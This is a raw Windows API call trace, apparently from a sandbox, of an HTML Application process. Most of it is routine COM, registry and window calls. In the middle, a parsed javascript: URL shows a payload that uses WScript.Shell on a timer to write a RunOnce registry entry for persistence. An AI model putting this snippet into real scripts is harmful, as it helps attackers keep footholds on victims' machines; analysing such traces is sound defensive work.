returned 0x0 [0066.849] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x33ed68 | out: phkResult=0x33ed68*=0x0) returned 0x2 [0066.849] RegOpenKeyExW (in: hKey=0x14c, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x33ed68 | out: phkResult=0x33ed68*=0x0) returned 0x2 [0066.849] RegCloseKey (hKey=0x0) returned 0x6 [0066.849] RegCloseKey (hKey=0x0) returned 0x6 [0066.849] RegCloseKey (hKey=0x14c) returned 0x0 [0066.849] RegCloseKey (hKey=0x1c8) returned 0x0 [0066.850] IUnknown:Release (This=0x7a28c0) returned 0x5 [0066.850] IUnknown:QueryInterface (in: This=0x7a28c0, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ee50 | out: ppvObject=0x33ee50*=0x0) returned 0x80004002 [0066.850] IServiceProvider:QueryService (in: This=0x7a28c4, guidService=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ee50 | out: ppvObject=0x33ee50*=0x0) returned 0x80004002 [0066.850] GetCurrentThreadId () returned 0x544 [0066.850] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ed9c | out: ppv=0x33ed9c*=0x75028d20) returned 0x0 [0066.850] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.852] IBindStatusCallback:OnStartBinding (This=0x7a28c0, dwReserved=0xff, pib=0x7a2f28) returned 0x0 [0066.852] IUnknown:AddRef (This=0x7a2f28) 
returned 0x2 [0066.852] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.852] IUnknown:QueryInterface (in: This=0x7a28c0, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ed60 | out: ppvObject=0x33ed60*=0x0) returned 0x80004002 [0066.852] IServiceProvider:QueryService (in: This=0x7a28c4, guidService=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ed60 | out: ppvObject=0x33ed60*=0x0) returned 0x80004002 [0066.852] GetCurrentThreadId () returned 0x544 [0066.853] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ed70 | out: ppv=0x33ed70*=0x75028d20) returned 0x0 [0066.853] IClassFactory:CreateInstance (in: This=0x75028d20, pUnkOuter=0x7a9718, riid=0x7681482c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7a973c | out: ppvObject=0x7a973c*=0x7abec8) returned 0x0 [0066.884] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x98) returned 0x7abec8 [0066.884] IUnknown_QueryService (in: punk=0x7a9718, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvOut=0x33eda0 | 
out: ppvOut=0x33eda0*=0x79638c) returned 0x0 [0066.884] IUnknown:QueryInterface (in: This=0x7a28c0, riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x33ec48 | out: ppvObject=0x33ec48*=0x0) returned 0x80004002 [0066.884] IServiceProvider:QueryService (in: This=0x7a28c4, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x33ec48 | out: ppvObject=0x33ec48*=0x79638c) returned 0x0 [0066.884] GetCurrentThreadId () returned 0x544 [0066.937] IUnknown:QueryInterface (in: This=0x7abec8, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x7a97a0 | out: ppvObject=0x7a97a0*=0x7abedc) returned 0x0 [0066.937] IUnknown:AddRef (This=0x7a9718) returned 0x7 [0066.937] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.937] IUnknown:Release (This=0x7abedc) returned 0x6 [0066.937] IUnknown:Release (This=0x7a9718) returned 0x6 [0066.937] IUnknown:AddRef (This=0x7abedc) returned 0x7 [0066.937] IUnknown:AddRef (This=0x7a9718) returned 0x7 [0066.937] IUnknown:Release (This=0x7abedc) returned 0x6 [0066.937] IUnknown:Release (This=0x7a9718) returned 0x6 [0066.937] IUnknown:QueryInterface (in: This=0x7abedc, riid=0x76826b10*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ee4c | out: ppvObject=0x33ee4c*=0x7a9728) returned 0x0 [0066.937] IUnknown:QueryInterface (in: This=0x7a9718, riid=0x76826b10*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, 
[7]=0xb)), ppvObject=0x33ee4c | out: ppvObject=0x33ee4c*=0x7a9728) returned 0x0 [0066.938] IUnknown:QueryInterface (in: This=0x7abec8, riid=0x76826b00*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x33ee58 | out: ppvObject=0x33ee58*=0x0) returned 0x80004002 [0067.663] IUnknown:AddRef (This=0x7a9718) returned 0x8 [0067.663] CoInternetParseUrl (in: pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=0x13, dwFlags=0x0, pszResult=0x33ce18, cchResult=0x1000, pcchResult=0x33ce00, dwReserved=0x0 | out: pszResult="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pcchResult=0x33ce00) returned 0x0 [0067.664] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33cc94 | out: ppv=0x33cc94*=0x75028d20) returned 0x0 [0067.664] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33cd80 | out: ppvObject=0x33cd80*=0x75028d2c) returned 0x0 [0067.664] IUnknown:Release (This=0x75028d20) returned 0x1 [0067.664] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new 
ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=19, dwParseFlags=0x0, pwzResult=0x33ce18, cchResult=0x1000, pcchResult=0x33ce00, dwReserved=0x0 | out: pwzResult="켄3", pcchResult=0x33ce00*=0x33cf04) returned 0x800c0011 [0067.664] IUnknown:Release (This=0x75028d2c) returned 0x1 [0067.664] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x7a5548 [0067.665] IUnknown:Release (This=0x7a08d0) returned 0x2 [0067.665] IUnknown:Release (This=0x78ca14) returned 0x17 [0067.665] IUnknown:Release (This=0x78ca14) returned 0x16 [0067.665] IUnknown:Release (This=0x78ca14) returned 0x15 [0067.665] CoTaskMemFree (pv=0x0) [0067.665] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1a8) returned 0x7ac770 [0067.665] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x33f298 | out: lpCPInfo=0x33f298) returned 1 [0067.666] IUnknown:AddRef (This=0x790188) returned 0x3 [0067.666] IUnknown:AddRef (This=0x78ca14) returned 0x16 [0067.666] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f2a0 | out: ppvObject=0x33f2a0*=0x78ca14) returned 0x0 [0067.666] IUnknown:Release (This=0x78ca14) returned 0x16 [0067.666] IUnknown:AddRef (This=0x78ca14) returned 0x17 [0067.666] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33f2a4 | out: pdwScheme=0x33f2a4*=0xf) returned 0x0 [0067.666] IUnknown:Release (This=0x790188) returned 0x2 [0067.666] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x58) returned 0x7a3190 [0067.666] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164 [0067.667] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74c1e718, lpParameter=0x7a3190, 
dwCreationFlags=0x0, lpThreadId=0x7a31a4 | out: lpThreadId=0x7a31a4*=0x93c) returned 0x14c [0067.668] GetCurrentThreadId () returned 0x544 [0067.668] IUnknown:Release (This=0x78ca14) returned 0x16 [0067.668] IUnknown:Release (This=0x78c78c) returned 0x3 [0067.668] IUnknown:Release (This=0x78af40) returned 0x3 [0067.668] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.668] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.668] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.668] IUnknown:Release (This=0x78ca14) returned 0x15 [0067.668] IUnknown:Release (This=0x78ca14) returned 0x14 [0067.668] IUnknown:Release (This=0x78ca14) returned 0x13 [0067.668] IUnknown:Release (This=0x78af40) returned 0x2 [0067.668] IUnknown:Release (This=0x78ca14) returned 0x12 [0067.668] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.669] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.669] CoTaskMemFree (pv=0x7a1d98) [0067.669] CoTaskMemFree (pv=0x0) [0067.669] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.669] IUnknown:Release (This=0x78ca14) returned 0x11 [0067.669] CoTaskMemFree (pv=0x7a1b90) [0067.669] GetClientRect (in: hWnd=0x3027a, lpRect=0x33f7bc | out: lpRect=0x33f7bc) returned 1 [0067.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x78) returned 0x771c90 [0067.669] GetClientRect (in: hWnd=0x3027a, lpRect=0x771cbc | out: lpRect=0x771cbc) returned 1 [0067.669] OffsetRect (in: lprc=0x771cbc, dx=0, dy=0 | out: lprc=0x771cbc) returned 1 [0067.670] OffsetRect (in: lprc=0x771ccc, dx=0, dy=0 | out: lprc=0x771ccc) returned 1 [0067.670] RegisterClassExW (param_1=0x33f2d8) returned 0xc168 [0067.670] CoCreateInstance (in: rclsid=0x74c3bf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, 
[2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x74c3bf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7502b020 | out: ppv=0x7502b020*=0x7ac938) returned 0x0 [0067.677] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x7ac938, aaClassList=0x33f3d0*=0xc168, uSize=0x1) returned 0x0 [0067.677] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc168, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x3027a, hMenu=0x0, hInstance=0x74af0000, lpParam=0x794ec0) returned 0x302a0 [0067.677] GetWindowLongW (hWnd=0x302a0, nIndex=-20) returned 0 [0067.677] SetWindowLongW (hWnd=0x302a0, nIndex=-21, dwNewLong=7950016) returned 0 [0067.677] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x81, wParam=0x0, lParam=0x33efa4*=7950016, plResult=0x33ee1c | out: plResult=0x33ee1c) returned 0x1 [0067.677] NtdllDefWindowProc_W () returned 0x1 [0067.677] GetCurrentThreadId () returned 0x544 [0067.677] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.677] GetCurrentThreadId () returned 0x544 [0067.678] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.678] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x1, wParam=0x0, lParam=0x33efa4*=7950016, plResult=0x33ee1c | out: plResult=0x33ee1c) returned 0x1 [0067.678] NtdllDefWindowProc_W () returned 0x0 [0067.678] GetCurrentThreadId () returned 0x544 [0067.678] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.678] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x33ee68 | out: plResult=0x33ee68) returned 0x1 [0067.678] NtdllDefWindowProc_W () returned 0x0 [0067.678] GetCurrentThreadId () returned 0x544 [0067.678] GetWindowLongW 
(hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.678] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x33ee68 | out: plResult=0x33ee68) returned 0x1 [0067.678] NtdllDefWindowProc_W () returned 0x0 [0067.678] GetCurrentThreadId () returned 0x544 [0067.678] NtdllDefWindowProc_W () returned 0x0 [0067.678] GetClassNameW (in: hWnd=0x3027a, lpClassName=0x33f3d8, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0067.678] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1 [0067.679] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x7ac938, fRestoreLayout=1) returned 0x0 [0067.679] SendMessageW (hWnd=0x302a0, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0067.679] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.679] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x33f28c | out: plResult=0x33f28c) returned 0x1 [0067.679] NtdllDefWindowProc_W () returned 0x3 [0067.679] GetCurrentThreadId () returned 0x544 [0067.679] IntersectRect (in: lprcDst=0x33f60c, lprcSrc1=0x771cbc, lprcSrc2=0x771ccc | out: lprcDst=0x33f60c) returned 1 [0067.679] EqualRect (lprc1=0x33f60c, lprc2=0x771cbc) returned 1 [0067.679] InvalidateRect (hWnd=0x302a0, lpRect=0x0, bErase=1) returned 1 [0067.679] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xf0) returned 0x7a1c90 [0067.680] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x150) returned 0x7a1d88 [0067.680] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x140) returned 0x7ad520 [0067.680] IntersectRect (in: lprcDst=0x33f4f8, lprcSrc1=0x33f4f8, lprcSrc2=0x33f490 | out: lprcDst=0x33f4f8) returned 1 [0067.680] IntersectRect (in: lprcDst=0x33f4f8, lprcSrc1=0x33f4f8, lprcSrc2=0x33f490 | out: lprcDst=0x33f4f8) returned 1 [0067.680] RtlAllocateHeap 
(HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x7a1ee0 [0067.680] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x30) returned 0x77dbc8 [0067.680] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xec) returned 0x7ad668 [0067.680] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.680] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.680] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77dc00 [0067.681] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79de48 [0067.682] GetCurrentThreadId () returned 0x544 [0067.682] GetCurrentThreadId () returned 0x544 [0067.682] GetCurrentThreadId () returned 0x544 [0067.682] IntersectRect (in: lprcDst=0x33f334, lprcSrc1=0x33f334, lprcSrc2=0x33f304 | out: lprcDst=0x33f334) returned 1 [0067.682] IntersectRect (in: lprcDst=0x7ad580, lprcSrc1=0x7ad580, lprcSrc2=0x33f324 | out: lprcDst=0x7ad580) returned 1 [0067.682] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.683] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a8f88 [0067.683] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a8f88 | out: hHeap=0x760000) returned 1 [0067.684] SetWindowPos (hWnd=0x302a0, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0067.684] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.684] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x46, wParam=0x0, lParam=0x33f5ec*=197280, plResult=0x33f488 | out: plResult=0x33f488) returned 0x1 [0067.684] NtdllDefWindowProc_W () returned 0x0 [0067.684] GetCurrentThreadId () returned 0x544 [0067.684] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.684] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x47, wParam=0x0, lParam=0x33f5ec*=197280, plResult=0x33f484 
| out: plResult=0x33f484) returned 0x1 [0067.685] NtdllDefWindowProc_W () returned 0x0 [0067.685] GetCurrentThreadId () returned 0x544 [0067.685] SetTimer (hWnd=0x302a0, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0067.685] GetFocus () returned 0x0 [0067.685] EnumChildWindows (hWndParent=0x302a0, lpEnumFunc=0x74e10a73, lParam=0x33f4e4) returned 0 [0067.686] GetFocus () returned 0x0 [0067.686] SetFocus (hWnd=0x302a0) returned 0x0 [0067.690] NtdllDefWindowProc_W () returned 0x0 [0067.690] NtdllDefWindowProc_W () returned 0x0 [0067.691] NtdllDefWindowProc_W () returned 0x0 [0067.691] NtdllDefWindowProc_W () returned 0x0 [0067.691] NtdllDefWindowProc_W () returned 0x0 [0067.692] NtdllDefWindowProc_W () returned 0x0 [0067.692] NtdllDefWindowProc_W () returned 0x0 [0067.693] NtdllDefWindowProc_W () returned 0x0 [0067.693] NtdllDefWindowProc_W () returned 0x0 [0067.693] NtdllDefWindowProc_W () returned 0x0 [0067.693] NtdllDefWindowProc_W () returned 0x1 [0067.693] NtdllDefWindowProc_W () returned 0x0 [0067.696] NtdllDefWindowProc_W () returned 0x0 [0068.447] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0068.447] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x75300000 [0068.456] GetProcAddress (hModule=0x75300000, lpProcName="LresultFromObject") returned 0x75302663 [0068.456] LresultFromObject () returned 0xc171 [0069.652] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x14) returned 0x7a2738 [0069.653] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9078 [0069.817] GetCurrentThreadId () returned 0x544 [0069.819] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a2738 | out: hHeap=0x760000) returned 1 [0069.820] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x60) returned 0x7b3088 [0069.820] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x7a2738 [0069.820] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x7b41f8 [0069.820] HeapFree (in: 
hHeap=0x760000, dwFlags=0x0, lpMem=0x7b3088 | out: hHeap=0x760000) returned 1 [0069.821] IUnknown:QueryInterface (in: This=0x7964dc, riid=0x758221d8*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x33ed98 | out: ppvObject=0x33ed98*=0x7b3088) returned 0x0 [0069.821] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x60) returned 0x7b3088 [0069.821] IConnectionPointContainer:FindConnectionPoint (in: This=0x7b3088, riid=0x758221b8*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x33edb0 | out: ppCP=0x33edb0*=0x7b30b0) returned 0x0 [0069.821] IConnectionPoint:Advise (in: This=0x7b30b0, pUnkSink=0x7c2b60, pdwCookie=0x7c2b78 | out: pdwCookie=0x7c2b78*=0x7c2b60) returned 0x0 [0069.821] IUnknown:QueryInterface (in: This=0x7c2b60, riid=0x74afa638*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x33ed54 | out: ppvObject=0x33ed54*=0x7c2b60) returned 0x0 [0069.822] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x7a2778 [0069.822] IUnknown:AddRef (This=0x7c2b60) returned 0x3 [0069.822] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x7b42d0 [0069.822] IUnknown:Release (This=0x7c2b60) returned 0x2 [0069.822] IUnknown:Release (This=0x7b30b0) returned 0x0 [0069.822] IUnknown:Release (This=0x7b3088) returned 0x0 [0069.822] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b3088 | out: hHeap=0x760000) returned 1 [0069.822] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9108 [0069.823] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x48) returned 0x7b1400 [0069.823] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0069.824] GetMessageTime () returned 0 [0069.824] GetMessagePos () returned 0x0 [0069.824] 
CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x33eeac | out: plResult=0x33eeac) returned 0x0 [0069.826] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0069.826] GetMessageTime () returned 0 [0069.826] GetMessagePos () returned 0x0 [0069.826] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x33e8dc | out: plResult=0x33e8dc) returned 0x0 [0069.827] GetCurrentThreadId () returned 0x544 [0069.827] GetCurrentThreadId () returned 0x544 [0069.827] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0069.827] GetMessageTime () returned 0 [0069.827] GetMessagePos () returned 0x0 [0069.827] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f060 | out: lpPoint=0x33f060) returned 1 [0069.828] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f060 | out: lpPoint=0x33f060) returned 1 [0069.828] GetCapture () returned 0x0 [0069.828] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x7afb38 [0069.828] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9138 [0069.828] IUnknown:AddRef (This=0x7c2b60) returned 0x5 [0069.828] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7b8e18 [0069.829] HTMLWindowEvents2:onresize (This=0x7c2b60, pEvtObj=0x418) [0069.829] IUnknown:Release (This=0x7c2b60) returned 0x4 [0069.829] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b8e18 | out: hHeap=0x760000) returned 1 [0069.829] GetCurrentThreadId () returned 0x544 [0069.829] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7afb38 | out: hHeap=0x760000) returned 1 [0069.829] GetCurrentThreadId () returned 0x544 [0069.829] GetCurrentThreadId () returned 0x544 [0069.829] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x33f29c | out: plResult=0x33f29c) returned 0x1 
